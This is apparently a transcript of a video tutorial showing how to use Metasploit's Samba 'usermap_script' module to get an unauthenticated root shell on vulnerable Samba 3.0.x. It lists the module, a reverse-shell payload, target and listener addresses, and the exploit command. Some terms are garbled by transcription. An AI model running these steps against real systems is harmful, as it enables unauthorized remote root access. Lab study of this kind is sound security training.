Welcome. In this video, we are going to learn username map script command execution in Metasploit. This module exploits a command execution vulnerability in Samba version 3.0.20 through 3.0.25 RC3. When using the non-default username map script configuration option, by specifying username containing shell meta characters, attackers can execute arbitrary command. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to the authentication. Let's open up terminal and type msf console. Let's load username map script module into the msf console. Type use exploit /multi/samba/usermap_script. Type info. Here you can see that module information, our host the target address, our port the target port. Let's set payload as command/unix/reverse. Type show options. Here you can see that payload and module options. Set remote host target address as 192.168.1.106. Type set our host 192.168.1.106. Type lhost the local host address as 192.168.1.105. Let's execute it. Type exploit. Here you can see that we get command shell session 1 opened. Type ID. Here you can see that uid and gid equals to root. So that's it in this video on Samba privilege escalation in Metasploit, or you can say username map script command execution in Metasploit. Thank you for watching this video.